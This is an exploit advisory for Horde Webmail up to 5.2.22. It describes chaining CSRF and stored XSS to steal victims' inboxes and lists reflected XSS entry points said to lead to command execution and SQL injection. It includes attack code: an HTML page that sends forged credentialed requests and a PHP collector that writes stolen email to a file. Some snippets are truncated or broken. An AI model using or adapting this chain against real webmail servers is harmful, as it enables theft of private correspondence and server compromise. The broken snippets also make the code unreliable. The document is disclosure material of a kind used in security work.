Horde Webmail 5.2.22 - Multiple Vulnerabilities


22 Nis 2019
# Title: Horde Webmail - XSS + CSRF to SQLi, RCE, Stealing Emails <= v5.2.22
# Date: 17.05.2019
# Author: InfinitumIT
# Vendor Homepage: https://www.horde.org/
# Version: Up to v5.2.22.
# CVE: CVE-2019-12094 & CVE-2019-12095

# Description:
# Attacker can combine "CSRF vulnerability in Trean Bookmarks (defaultly installed on Horde Groupware)" and
# "Stored XSS vulnerability in Horde TagCloud (defaultly installed)" vulnerabilities to steal victim's emails.

# Also:
# Attacker can use 3 different reflected XSS vulnerability to exploit Remote Command Execution, SQL Injection and Code Execution.
# To steal e-mails, attacker will send an e-mail to victim and victim will click the attacker's website.
# So, victim's inbox will be dumped in attacker's FTP.
# All of them vulnerabillities are valid for all Horde Webmail versions.

# Attacker will exploit the CSRF and XSS with: index.html
# Attacker will steal and post the emails with: stealer.js
# Attacker will save the emails with: stealer.php

# index.html Codes:
var url = "http://webmail.victimserver.com/trean/";
var params =
var vuln = new XMLHttpRequest();
vuln.open("POST", url, true);
vuln.withCredentials = 'true';

# stealer.js Codes:
// It is charcoded, firstly decode and edit for yourself then encode again. Also dont forget to remove spaces!

# stealer.php Codes:
header('Access-Control-Allow-Origin: *');
header('Access-Control-Allow-Headers: *');
$logs = fopen("inbox.txt", "a+");
$data = $_POST['inbox']."
fwrite($logs, $data);


# Reflected XSS to Remote Command Execution, Remote Code Execution and SQL Injection:

# http://webmail.victimserver.com/groupware/admin/user.php?user_name=XSS-PAYLOAD-HERE&form=update_f
# [COLOR="Red"]http://webmailvictimse...r_name=XSS-PAYLOAD-HERE&form=remove_f[/COLOR]
# http://webmail.victimserver.com/groupware/admin/config/diff.php?app=XSS-PAYLOAD-HERE

# Attacker can execute commands & PHP codes remotely and inject harmful SQL queries.
# Also, attacker can create users too with those reflected XSS vulnerabilities.

# Stay Secure with InfinitumIT - infinitumit.com.tr

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